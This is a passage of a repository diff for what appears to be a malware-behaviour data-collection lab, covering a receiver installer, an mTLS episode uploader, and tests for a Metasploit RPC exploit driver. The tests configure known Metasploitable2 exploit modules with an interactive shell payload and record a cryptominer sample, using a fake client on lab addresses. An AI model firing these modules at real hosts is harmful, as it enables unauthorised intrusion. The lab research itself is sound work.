REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
SERVICE_USER="${SERVICE_USER:-cis490}"
log() { printf '[install-receiver] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }
# --- 1. prereqs --------------------------------------------------------
log "checking prereqs"
if [[ $EUID -ne 0 ]]; then
die "must run as root"
fi
command -v systemctl >/dev/null || die "systemd not found"
command -v python3 >/dev/null || die "python3 not on PATH"
PY_VER="$(python3 -c 'import sys; print(f"{sys.version_info.major}.{sys.version_info.minor}")')"
if ! python3 -c 'import sys; sys.exit(0 if sys.version_info >= (3,11) else 1)'; then
die "python >=3.11 required, found $PY_VER"
fi
USE_UV=0
if command -v uv >/dev/null; then USE_UV=1; fi
# --- 2. user + layout --------------------------------------------------
log "ensuring service user $SERVICE_USER"
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
useradd --system --no-create-home --shell /usr/sbin/nologin \
--home-dir "$INSTALL_ROOT" "$SERVICE_USER"
fi
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
"$DATA_ROOT" "$DATA_ROOT/episodes" "$DATA_ROOT/incoming"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0750 "$DATA_ROOT"
# Pre-create the index file so the first PUT doesn't race on creation.
sudo -u "$SERVICE_USER" -- touch "$DATA_ROOT/index.jsonl"
# --- 3. repo + venv ----------------------------------------------------
log "syncing repo into $INSTALL_ROOT"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
log "building venv"
if [[ "$USE_UV" -eq 1 ]]; then
sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
uv sync --project "$INSTALL_ROOT"
else
sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
--quiet --upgrade pip
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
--quiet starlette 'uvicorn[standard]'
fi
# --- 4. systemd --------------------------------------------------------
log "installing systemd units (receiver + bootstrap)"
install -m 0644 "$REPO_ROOT/etc/cis490-receiver.service" \
/etc/systemd/system/cis490-receiver.service
install -m 0644 "$REPO_ROOT/etc/cis490-bootstrap.service" \
/etc/systemd/system/cis490-bootstrap.service
systemctl daemon-reload
# --- 5. config template (only on first install) -----------------------
if [[ ! -f "$ETC_ROOT/receiver.toml" ]]; then
log "writing $ETC_ROOT/receiver.toml (template)"
install -m 0640 -o root -g "$SERVICE_USER" \
"$REPO_ROOT/etc/receiver.toml.example" "$ETC_ROOT/receiver.toml"
log ""
log "FIRST-INSTALL NEXT STEPS:"
log " 1. Verify $ETC_ROOT/receiver.toml paths."
log " 2. Add a collector.wg block to your spectral/caddy config."
log " Example:"
log " collector.wg {"
log " tls internal"
log " reverse_proxy 127.0.0.1:8443"
log " }"
log " (mTLS to clients is enforced by the wg-pki CA bundle on"
log " the receiver side once leaf certs are issued.)"
log " 3. Open the WG-side port via iptmonads."
log " 4. systemctl enable --now cis490-receiver cis490-bootstrap"
log " 5. From a lab host: cis490-shipper --ping"
log ""
log "Bootstrap endpoint (cis490-bootstrap on :8446 + Caddy bootstrap.wg)"
log "lets enrolled lab hosts auto-fetch their leaf certs. Without it,"
log "operators have to hand-carry tarballs via deploy-cis490-cert.sh."
else
log "$ETC_ROOT/receiver.toml exists; leaving in place"
fi
log "receiver install complete."

View file

@ -0,0 +1,50 @@
#!/usr/bin/env bash
# Wrapper that re-points the wg-pki issuer script's relative-path
# assumption (PWD-derived publish dir, $REPO_ROOT/issued/) to the
# absolute /var/lib/wg-pki/issued/ that the bootstrap service uses.
#
# wg-pki ships the actual issuer at
# /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh, which
# computes paths relative to its own location. This wrapper sets
# WG_PKI_STATE so the CA key is found in /var/lib/wg-pki, and forces
# --out-dir to a path under /var/lib so cis490-bootstrap (with
# ProtectHome=tmpfs) can write the resulting tarballs.
set -euo pipefail
# Resolve issuer path: prefer the install-time copy at /opt/wg-pki/,
# fall back to whatever wg-pki clone the operator has under /home.
ISSUER="${WG_PKI_ISSUER:-}"
if [[ -z "$ISSUER" ]]; then
for cand in \
/opt/wg-pki/scripts/issue-cis490-client-cert.sh \
/home/max/wg-pki/scripts/issue-cis490-client-cert.sh \
/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh; do
if [[ -x "$cand" ]]; then ISSUER="$cand"; break; fi
done
fi
if [[ -z "$ISSUER" || ! -x "$ISSUER" ]]; then
echo "wrapper: no issue-cis490-client-cert.sh found; tried /opt/wg-pki, /home/max/wg-pki, /home/max/.env/wg-pki" >&2
exit 2
fi
OUT_ROOT="/var/lib/wg-pki/issued"
if [[ $# -lt 1 ]]; then
echo "usage: $0 <host_id> [--out-dir DIR] [--days N]" >&2
exit 2
fi
HOST_ID="$1"; shift
# Pull off any --out-dir already passed; we override.
EXTRA=()
while [[ $# -gt 0 ]]; do
case "$1" in
--out-dir) shift 2 ;; # drop, we set it ourselves
*) EXTRA+=("$1"); shift ;;
esac
done
mkdir -p "$OUT_ROOT/$HOST_ID"
exec env WG_PKI_STATE=/var/lib/wg-pki \
"$ISSUER" "$HOST_ID" --out-dir "$OUT_ROOT/$HOST_ID" "${EXTRA[@]}"

0
shipper/__init__.py Normal file
View file

106
shipper/__main__.py Normal file
View file

@ -0,0 +1,106 @@
"""``cis490-shipper`` CLI entrypoint.
Modes:
--ping hit /v1/ping; exit 0 if 200/ok, non-zero otherwise.
No tarball flow; index.jsonl on the receiver is untouched.
--once one scan pass over data/episodes/, ship anything done, exit.
(default) long-running daemon; rescans every scan_interval_s.
"""
from __future__ import annotations
import argparse
import json
import logging
import signal
import sys
from pathlib import Path
from .config import ShipperConfig
from .queue import ShipperQueue
from .transport import ShipperTransport
def _setup_logging(level: str) -> None:
logging.basicConfig(
level=getattr(logging, level.upper(), logging.INFO),
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
def main(argv: list[str] | None = None) -> int:
parser = argparse.ArgumentParser(prog="cis490-shipper")
parser.add_argument(
"--config",
default="/etc/cis490/lab-host.toml",
help="Path to lab-host config (TOML)",
)
parser.add_argument(
"--ping",
action="store_true",
help="Hit /v1/ping on the receiver and exit",
)
parser.add_argument(
"--once",
action="store_true",
help="One scan pass, then exit (default is long-running daemon)",
)
parser.add_argument("--log-level", default="INFO")
args = parser.parse_args(argv)
_setup_logging(args.log_level)
log = logging.getLogger("cis490.shipper")
try:
cfg = ShipperConfig.load(args.config)
except (FileNotFoundError, ValueError) as e:
log.error("config error: %s", e)
return 2
transport = ShipperTransport(cfg)
if args.ping:
result = transport.ping()
# Print structured one-liner for CI / test pipelines.
print(json.dumps({
"ok": result.ok,
"status_code": result.status_code,
"host_id": cfg.host_id,
"receiver": cfg.receiver.url,
"body": result.body,
"error": result.error,
}))
return 0 if result.ok else 1
queue = ShipperQueue(cfg, transport)
if args.once:
result = queue.run_once()
log.info(
"scan complete: scanned=%d shipped=%d transient=%d conflicts=%d fatal=%d",
result.scanned, result.shipped, result.transient_failures,
result.conflicts, result.fatal,
)
# Exit code reflects fatal-only; transient failures aren't an error
# because the next pass / pod restart will retry.
return 1 if result.fatal else 0
# Daemon mode
stopping = False
def _stop(signum, frame): # noqa: ARG001
nonlocal stopping
log.info("received signal %s; finishing pass and exiting", signum)
stopping = True
signal.signal(signal.SIGTERM, _stop)
signal.signal(signal.SIGINT, _stop)
log.info(
"shipper starting: host_id=%s data_root=%s receiver=%s",
cfg.host_id, cfg.data_root, cfg.receiver.url,
)
queue.run_forever(stop_check=lambda: stopping)
return 0
if __name__ == "__main__":
sys.exit(main())

91
shipper/config.py Normal file
View file

@ -0,0 +1,91 @@
"""Lab-host shipper config — loaded from /etc/cis490/lab-host.toml."""
from __future__ import annotations
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
@dataclass(frozen=True)
class ReceiverEndpoint:
url: str # e.g. "https://collector.wg"
ca_bundle: Path | None = None
client_cert: Path | None = None
client_key: Path | None = None
bearer_token: str | None = None
verify_tls: bool = True
@dataclass(frozen=True)
class ShipperConfig:
host_id: str
data_root: Path # Lab-host data root; episodes/, outbox/, shipped/ live here.
receiver: ReceiverEndpoint
# Daemon mode: how often to scan for new done.marker files.
scan_interval_s: float = 5.0
# PUT timeout per episode. Tarballs are bounded by max_episode_bytes;
# at WG speeds this is well under 60s for a typical episode.
request_timeout_s: float = 60.0
# Backoff schedule on transient (5xx / network) failures, in seconds,
# capped at the last entry. The shipper's scan loop will pick the
# episode up again on the next pass regardless.
backoff_seconds: tuple[float, ...] = (1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0)
# Local retention before pruning data/shipped/.
keep_local_for_days: int = 7
@property
def episodes_dir(self) -> Path:
return self.data_root / "episodes"
@property
def outbox_dir(self) -> Path:
return self.data_root / "outbox"
@property
def shipped_dir(self) -> Path:
return self.data_root / "shipped"
@classmethod
def load(cls, path: str | Path) -> "ShipperConfig":
with open(path, "rb") as f:
data = tomllib.load(f)
host_id = data.get("host_id")
if not isinstance(host_id, str) or not host_id:
raise ValueError("lab-host config: host_id (string) required at top level")
paths = data.get("paths", {})
data_root = Path(paths.get("data_root", "/var/lib/cis490/data")).resolve()
rcv = data.get("receiver", {})
url = rcv.get("url")
if not isinstance(url, str) or not url:
raise ValueError("lab-host config: receiver.url required")
receiver = ReceiverEndpoint(
url=url.rstrip("/"),
ca_bundle=_optional_path(rcv.get("ca_bundle")),
client_cert=_optional_path(rcv.get("client_cert")),
client_key=_optional_path(rcv.get("client_key")),
bearer_token=rcv.get("bearer_token"),
verify_tls=bool(rcv.get("verify_tls", True)),
)
retention = data.get("retention", {})
return cls(
host_id=host_id,
data_root=data_root,
receiver=receiver,
scan_interval_s=float(data.get("shipper", {}).get("scan_interval_s", 5.0)),
request_timeout_s=float(data.get("shipper", {}).get("request_timeout_s", 60.0)),
keep_local_for_days=int(retention.get("keep_local_for_days", 7)),
)
def _optional_path(v: object) -> Path | None:
if v in (None, ""):
return None
if isinstance(v, str):
return Path(v).expanduser()
raise TypeError(f"expected path string, got {type(v).__name__}")

195
shipper/queue.py Normal file
View file

@ -0,0 +1,195 @@
"""Shipper episode queue — scan, compress, ship, retire.
State machine, mirroring docs/transport.md:
data/episodes/<id>/done.marker
|
v
tar+zstd data/outbox/<id>.tar.zst.partial
|
v
rename data/outbox/<id>.tar.zst
|
v
PUT to receiver
|
+-- 200/201 mv data/episodes/<id> data/shipped/<id>
| rm data/outbox/<id>.tar.zst
|
+-- 409 leave files in place (the local + remote tarball
| differ; manual triage)
|
+-- 5xx/net leave outbox tarball; retry on next pass
|
+-- 4xx log + skip (caller-side bug, doesn't self-heal)
Idempotent on every pass. A crash mid-tar leaves only a ``.partial``
which the next pass overwrites. A crash mid-PUT leaves the tarball in
``outbox/`` and the next pass re-ships it; the receiver responds 200
on a matching sha256, 409 on a divergent one.
"""
from __future__ import annotations
import logging
import shutil
import subprocess
import tarfile
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from .config import ShipperConfig
from .transport import ShipperTransport, ShipResult, hash_file
log = logging.getLogger("cis490.shipper.queue")
@dataclass(frozen=True)
class PassResult:
scanned: int
shipped: int
transient_failures: int
conflicts: int
fatal: int
class ShipperQueue:
def __init__(self, cfg: ShipperConfig, transport: ShipperTransport) -> None:
self.cfg = cfg
self.transport = transport
cfg.episodes_dir.mkdir(parents=True, exist_ok=True)
cfg.outbox_dir.mkdir(parents=True, exist_ok=True)
cfg.shipped_dir.mkdir(parents=True, exist_ok=True)
# ---- main entry point ---------------------------------------------
def run_once(self) -> PassResult:
"""One scan pass. Returns counts for logging / tests."""
ready = self._ready_episodes()
scanned = len(ready)
shipped = 0
transient = 0
conflicts = 0
fatal = 0
for ep_dir in ready:
episode_id = ep_dir.name
try:
tarball, sha = self._tar_episode(ep_dir)
except Exception:
log.exception("tar failed for %s", episode_id)
transient += 1
continue
res = self.transport.ship_tarball(episode_id, tarball, sha)
log.info(
"ship %s -> %s (%d) %s",
episode_id, res.status, res.status_code, res.error or "",
)
if res.status in ("stored", "already-present"):
self._retire(ep_dir, tarball)
shipped += 1
elif res.status == "conflict":
conflicts += 1
# Keep the tarball + episode dir in place. Operator must
# decide whether to drop our copy or fix the remote one.
elif res.status == "transient":
transient += 1
else: # fatal
fatal += 1
return PassResult(
scanned=scanned,
shipped=shipped,
transient_failures=transient,
conflicts=conflicts,
fatal=fatal,
)
def run_forever(self, *, stop_check=lambda: False) -> None:
while not stop_check():
try:
self.run_once()
except Exception:
log.exception("scan pass crashed; sleeping anyway")
# Coarse sleep: we don't need precise scheduling and we
# don't want a tight loop on errors.
t0 = time.monotonic()
while time.monotonic() - t0 < self.cfg.scan_interval_s:
if stop_check():
return
time.sleep(0.5)
# ---- internals -----------------------------------------------------
def _ready_episodes(self) -> list[Path]:
out: list[Path] = []
if not self.cfg.episodes_dir.exists():
return out
for ep in sorted(self.cfg.episodes_dir.iterdir()):
if ep.is_dir() and (ep / "done.marker").exists():
out.append(ep)
return out
def _tar_episode(self, ep_dir: Path) -> tuple[Path, str]:
"""Tar+zstd the episode dir into outbox. Idempotent — overwrites
any prior partial. Returns ``(tarball_path, sha256_hex)``."""
episode_id = ep_dir.name
outbox = self.cfg.outbox_dir
partial = outbox / f"{episode_id}.tar.zst.partial"
final = outbox / f"{episode_id}.tar.zst"
partial.unlink(missing_ok=True)
# We use the system `zstd` for streaming compression: pipe a
# tar stream into `zstd -T0 -19` to get a deterministic tarball
# without buffering the whole tar in memory or pulling in the
# python-zstandard dependency. Falls back to in-process `zstd`
# via the python wheel if the binary isn't on PATH.
if _which_zstd():
with partial.open("wb") as zout:
proc = subprocess.Popen(
["zstd", "-q", "-T0", "-19", "--stdout"],
stdin=subprocess.PIPE, stdout=zout,
)
assert proc.stdin is not None
with tarfile.open(fileobj=proc.stdin, mode="w|") as tf:
tf.add(ep_dir, arcname=episode_id, recursive=True)
proc.stdin.close()
rc = proc.wait()
if rc != 0:
partial.unlink(missing_ok=True)
raise RuntimeError(f"zstd exited {rc}")
else:
# Fallback: pipe through python's built-in zlib via gzip is
# NOT compatible (we want zstd). Surface the missing binary
# rather than silently producing a non-zstd tarball.
partial.unlink(missing_ok=True)
raise RuntimeError(
"the `zstd` binary is required on the lab host. "
"Install it via your package manager."
)
sha = hash_file(partial)
partial.replace(final)
return final, sha
def _retire(self, ep_dir: Path, tarball: Path) -> None:
"""Move episode dir → shipped/, drop the tarball."""
target = self.cfg.shipped_dir / ep_dir.name
if target.exists():
# Belt-and-suspenders: re-shipping an already-retired
# episode shouldn't happen (the dir was moved), but if it
# does, prefer the existing copy and just clean up.
shutil.rmtree(ep_dir, ignore_errors=True)
else:
ep_dir.replace(target)
tarball.unlink(missing_ok=True)
def _which_zstd() -> bool:
return shutil.which("zstd") is not None

203
shipper/transport.py Normal file
View file

@ -0,0 +1,203 @@
"""HTTP transport for the lab-host shipper.
Two operations against the receiver:
POST /v1/ping smoke test
PUT /v1/episodes/<host>/<episode>.tar.zst episode upload
Auth is mTLS (client cert from wg-pki) when configured. A bearer token
is supported as a stand-in during early bring-up before the cert is
issued; production runs should set both.
The transport returns small dataclasses rather than throwing the
caller (shipper queue) decides whether to retry, move to shipped/, or
alert. This keeps the retry policy in one place.
"""
from __future__ import annotations
import hashlib
import logging
import ssl
from dataclasses import dataclass
from pathlib import Path
from typing import Any
import httpx
from .config import ReceiverEndpoint, ShipperConfig
log = logging.getLogger("cis490.shipper.transport")
SCHEMA_VERSION = 1
@dataclass(frozen=True)
class PingResult:
ok: bool
status_code: int
body: dict[str, Any] | None
error: str | None
@dataclass(frozen=True)
class ShipResult:
status: str # "stored" | "already-present" | "conflict" | "transient" | "fatal"
status_code: int
sha256: str | None
body: dict[str, Any] | None
error: str | None
def _build_ssl_context(rcv: ReceiverEndpoint) -> ssl.SSLContext | bool:
"""Build an SSL context honoring the wg-pki CA bundle + client cert.
Returns True / a bundle path / a context. httpx accepts all three;
we use a context so we can attach the client cert for mTLS."""
if not rcv.url.lower().startswith("https://"):
return False
ctx = ssl.create_default_context(
cafile=str(rcv.ca_bundle) if rcv.ca_bundle else None,
)
if not rcv.verify_tls:
# Dev-only path; production lab-hosts should always pin the
# wg-pki CA. Logged loudly so it doesn't slip through.
log.warning("TLS verification disabled — dev-only configuration")
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
if rcv.client_cert and rcv.client_key:
ctx.load_cert_chain(str(rcv.client_cert), str(rcv.client_key))
return ctx
class ShipperTransport:
def __init__(self, cfg: ShipperConfig) -> None:
self.cfg = cfg
self._verify = _build_ssl_context(cfg.receiver)
# ---- ping ----------------------------------------------------------
def ping(self) -> PingResult:
url = f"{self.cfg.receiver.url}/v1/ping"
headers = self._common_headers()
try:
with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c:
r = c.post(url, headers=headers, content=b"")
except httpx.HTTPError as e:
return PingResult(ok=False, status_code=0, body=None, error=str(e))
body: dict[str, Any] | None = None
try:
body = r.json()
except Exception:
pass
if r.status_code == 200 and isinstance(body, dict) and body.get("ok"):
return PingResult(ok=True, status_code=200, body=body, error=None)
return PingResult(
ok=False,
status_code=r.status_code,
body=body,
error=f"unexpected status {r.status_code}",
)
# ---- ship ----------------------------------------------------------
def ship_tarball(
self,
episode_id: str,
tarball_path: Path,
sha256_hex: str,
) -> ShipResult:
url = (
f"{self.cfg.receiver.url}/v1/episodes/"
f"{self.cfg.host_id}/{episode_id}.tar.zst"
)
size = tarball_path.stat().st_size
headers = self._common_headers() | {
"Content-Type": "application/zstd",
"Content-Length": str(size),
"X-Content-SHA256": sha256_hex,
"X-Episode-Id": episode_id,
}
try:
with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c, \
tarball_path.open("rb") as body:
# httpx streams from a file-like object via the `content=` kwarg.
r = c.put(url, headers=headers, content=body)
except httpx.HTTPError as e:
return ShipResult(
status="transient",
status_code=0,
sha256=None,
body=None,
error=str(e),
)
body_json: dict[str, Any] | None = None
try:
body_json = r.json()
except Exception:
pass
if r.status_code == 201:
return ShipResult(
status="stored",
status_code=201,
sha256=sha256_hex,
body=body_json,
error=None,
)
if r.status_code == 200:
return ShipResult(
status="already-present",
status_code=200,
sha256=sha256_hex,
body=body_json,
error=None,
)
if r.status_code == 409:
return ShipResult(
status="conflict",
status_code=409,
sha256=sha256_hex,
body=body_json,
error="receiver already has a different sha256 for this id",
)
if 500 <= r.status_code < 600:
return ShipResult(
status="transient",
status_code=r.status_code,
sha256=None,
body=body_json,
error=f"server error {r.status_code}",
)
# 4xx other than 409: caller-side bug — don't retry.
return ShipResult(
status="fatal",
status_code=r.status_code,
sha256=None,
body=body_json,
error=f"client error {r.status_code}",
)
# ---- helpers -------------------------------------------------------
def _common_headers(self) -> dict[str, str]:
h: dict[str, str] = {
"X-Lab-Host": self.cfg.host_id,
"X-Schema-Version": str(SCHEMA_VERSION),
}
if self.cfg.receiver.bearer_token:
h["Authorization"] = f"Bearer {self.cfg.receiver.bearer_token}"
return h
def hash_file(path: Path) -> str:
h = hashlib.sha256()
with path.open("rb") as f:
for chunk in iter(lambda: f.read(1024 * 1024), b""):
h.update(chunk)
return h.hexdigest()

View file

@ -74,6 +74,57 @@ def test_episode_id_can_be_overridden(tmp_path: Path) -> None:
assert result.episode_dir == tmp_path / "episodes" / "01TEST"
def test_meta_sample_records_full_sample_when_passed(tmp_path: Path) -> None:
"""EpisodeConfig.sample → meta.sample carries identity + kind so
trainers can join episodes by family/sha256 without re-deriving
from events. With no Sample, meta.sample stays null."""
import os as _os
from samples.manifest import Sample
s = Sample(
name="xmrig-cryptominer",
family="XMRig",
category="cryptominer",
profile="cpu-saturate",
sha256="abc" * 21 + "d", # 64 hex
source="MalwareBazaar",
)
cfg = EpisodeConfig(
target_pid=_os.getpid(),
duration_s=0.1,
interval_ms=50,
data_root=tmp_path,
sample=s,
)
result = EpisodeRunner(cfg).run()
meta = json.loads((result.episode_dir / "meta.json").read_text())
assert meta["sample"] is not None
assert meta["sample"]["name"] == "xmrig-cryptominer"
assert meta["sample"]["family"] == "XMRig"
assert meta["sample"]["category"] == "cryptominer"
assert meta["sample"]["profile"] == "cpu-saturate"
assert meta["sample"]["kind"] == "real"
assert meta["sample"]["sha256"] == "abc" * 21 + "d"
def test_meta_sample_is_null_for_v1_path(tmp_path: Path) -> None:
"""No sample passed → the v1 fallback path. meta.sample stays
null so trainers can detect (and filter out) info-less runs."""
import os as _os
cfg = EpisodeConfig(
target_pid=_os.getpid(),
duration_s=0.1,
interval_ms=50,
data_root=tmp_path,
)
result = EpisodeRunner(cfg).run()
meta = json.loads((result.episode_dir / "meta.json").read_text())
assert meta["sample"] is None
def test_episode_writes_done_marker_last(tmp_path: Path) -> None:
"""done.marker should not appear until meta.json has ended_at_wall set."""
cfg = EpisodeConfig(

484
tests/test_exploits.py Normal file
View file

@ -0,0 +1,484 @@
"""Tests for the Tier-3 exploit driver and its module loader.
The msfrpc transport itself is exercised against a fake client so the
suite runs in-process. A live-msfrpcd integration test is out of
scope here the wire format is small and the high-value coverage is
the phase-to-action mapping plus the events the driver emits.
"""
from __future__ import annotations
import json
from pathlib import Path
from typing import Any
import pytest
from exploits.driver import DriverConfig, MSFExploitDriver
from exploits.modules import ModuleConfig, load_module_config
REPO_ROOT = Path(__file__).resolve().parent.parent
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
# -----------------------------------------------------------------------
# Module config loader
# -----------------------------------------------------------------------
def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
"""The fleet's entry-vector variety depends on the module catalog
being populated. Five Metasploitable2 vectors is the minimum
that gives the trainer a non-trivial diversity of armed
infecting transition shapes."""
from exploits.modules import load_module_configs
catalog = load_module_configs(MODULES_DIR)
assert len(catalog) >= 5, \
f"only {len(catalog)} modules; need at least 5 for fleet variety"
names = set(catalog.keys())
expected = {
"vsftpd_234_backdoor",
"samba_usermap_script",
"distccd_command_exec",
"php_cgi_arg_injection",
"unreal_ircd_3281_backdoor",
}
missing = expected - names
assert not missing, f"missing canonical modules: {missing}"
def test_load_vsftpd_module_config_round_trip() -> None:
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
assert cfg.name == "vsftpd_234_backdoor"
assert cfg.module_type == "exploit"
assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
assert cfg.options["RPORT"] == 21
assert cfg.options["RHOSTS"] == "{{ target_ip }}"
assert cfg.payload_path == "cmd/unix/interact"
def test_render_options_substitutes_target_ip() -> None:
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
rendered = cfg.render_options(target_ip="10.200.0.10")
assert rendered["RHOSTS"] == "10.200.0.10"
assert rendered["RPORT"] == 21
assert rendered["PAYLOAD"] == "cmd/unix/interact"
def test_select_module_is_deterministic() -> None:
from exploits.modules import load_module_configs, select_module
catalog = load_module_configs(MODULES_DIR)
a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
assert a is b
def test_select_module_diversifies_across_hosts() -> None:
from exploits.modules import load_module_configs, select_module
catalog = load_module_configs(MODULES_DIR)
matches = 0
for slot in range(20):
a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
b = select_module(catalog, host_id="bob", slot=slot, episode_index=0)
if a is b:
matches += 1
assert matches < 15, "host_id seed isn't producing module variety"
def test_select_module_walks_catalog() -> None:
from exploits.modules import load_module_configs, select_module
catalog = load_module_configs(MODULES_DIR)
seen = set()
for ep in range(200):
seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
assert seen == set(catalog.keys()), \
f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
def test_module_target_port_pulls_rport() -> None:
from exploits.modules import load_module_configs, module_target_port
catalog = load_module_configs(MODULES_DIR)
assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
assert module_target_port(catalog["samba_usermap_script"]) == 139
assert module_target_port(catalog["distccd_command_exec"]) == 3632
assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
p = tmp_path / "x.toml"
p.write_text(
'[module]\n'
'type = "exploit"\n'
'path = "unix/ftp/example"\n'
'[module.options]\n'
'RHOSTS = "{{target_ip}}"\n'
'LHOST = "{{ target_ip }}"\n'
)
cfg = load_module_config(p)
rendered = cfg.render_options(target_ip="10.0.0.5")
assert rendered["RHOSTS"] == "10.0.0.5"
assert rendered["LHOST"] == "10.0.0.5"
def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text('[module]\ntype = "exploit"\n')
with pytest.raises(ValueError, match="module.path"):
load_module_config(p)
def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text(
'[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
)
with pytest.raises(ValueError, match="module.type"):
load_module_config(p)
# -----------------------------------------------------------------------
# Exploit driver — phase transitions against a fake MSFRpcClient
# -----------------------------------------------------------------------
class FakeMSFRpcClient:
"""Stand-in that records every method called and lets a test
script the apparent state of msfrpcd (sessions, return values)."""
def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
self.calls: list[tuple[str, tuple, dict]] = []
self.logged_in = False
self._fired = False
self._sessions: dict[int, dict[str, Any]] = {}
self._sessions_after_fire = sessions_after_fire or {}
self.shell_writes: list[tuple[int, str]] = []
def _record(self, name: str, *args, **kwargs) -> None:
self.calls.append((name, args, kwargs))
def login(self) -> None:
self._record("login")
self.logged_in = True
def logout(self) -> None:
self._record("logout")
self.logged_in = False
def session_list(self) -> dict[int, dict[str, Any]]:
self._record("session_list")
return dict(self._sessions)
def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
self._record("module_execute", mtype, mname, opts)
self._fired = True
# Simulate sessions appearing after the exploit fires.
self._sessions = dict(self._sessions_after_fire)
return {"job_id": 7, "uuid": "fake-uuid"}
def job_stop(self, job_id) -> dict:
self._record("job_stop", job_id)
return {"result": "success"}
def session_shell_write(self, sid: int, data: str) -> dict:
self._record("session_shell_write", sid, data)
if not data.endswith("\n"):
data = data + "\n"
self.shell_writes.append((sid, data))
return {"write_count": str(len(data))}
def session_shell_read(self, sid: int) -> str:
self._record("session_shell_read", sid)
return "uid=0(root) gid=0(root)\n"
def session_stop(self, sid: int) -> dict:
self._record("session_stop", sid)
self._sessions.pop(sid, None)
return {"result": "success"}
def _make_driver(
sessions_after_fire: dict[int, dict[str, Any]] | None = None,
target_ip: str = "10.200.0.10",
) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
events: list[tuple[str, dict]] = []
def emit(event: str, **extra: Any) -> None:
events.append((event, extra))
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip=target_ip,
session_open_timeout_s=0.5, # tests must not block
),
emit_event=emit,
)
return driver, client, events
def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
driver, client, events = _make_driver()
client._sessions = {99: {"type": "shell"}} # pre-existing session
driver.setup()
assert client.logged_in is True
assert driver._sessions_seen_at_arm == {99}
assert events[0][0] == "driver_setup"
assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
assert events[0][1]["target_ip"] == "10.200.0.10"
def test_full_phase_walk_emits_expected_event_order() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
)
driver.setup()
for phase in [
"clean", "armed", "infecting",
"infected_running", "dormant",
"infected_running", "dormant",
"clean",
]:
driver.set_phase(phase)
driver.teardown()
names = [e[0] for e in events]
# Order matters: fire comes before session_open, which comes before
# workload, which comes before kill+logout.
assert names.index("exploit_fire") < names.index("session_open")
assert names.index("session_open") < names.index("session_landing_probe")
assert names.index("session_landing_probe") < names.index("sample_executed")
assert names.count("sample_executed") == 2 # two infected_running phases
assert names.count("session_dormant") == 2
assert "session_killed" in names
# Driver should have asked the FakeClient to fire exactly once.
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
assert len(fire_calls) == 1
_, args, _ = fire_calls[0]
assert args[1] == "unix/ftp/vsftpd_234_backdoor"
assert args[2]["RHOSTS"] == "10.200.0.10"
assert args[2]["PAYLOAD"] == "cmd/unix/interact"
def test_session_open_timeout_emits_timeout_event() -> None:
# No sessions ever appear after fire.
driver, client, events = _make_driver(sessions_after_fire={})
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
names = [e[0] for e in events]
assert "session_open_timeout" in names
assert "session_open" not in names
def test_workload_phases_are_no_op_without_session() -> None:
driver, client, events = _make_driver(sessions_after_fire={})
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting") # times out, no session
driver.set_phase("infected_running")
driver.set_phase("dormant")
# No shell writes should have happened.
assert client.shell_writes == []
def test_arm_is_idempotent() -> None:
driver, client, events = _make_driver(
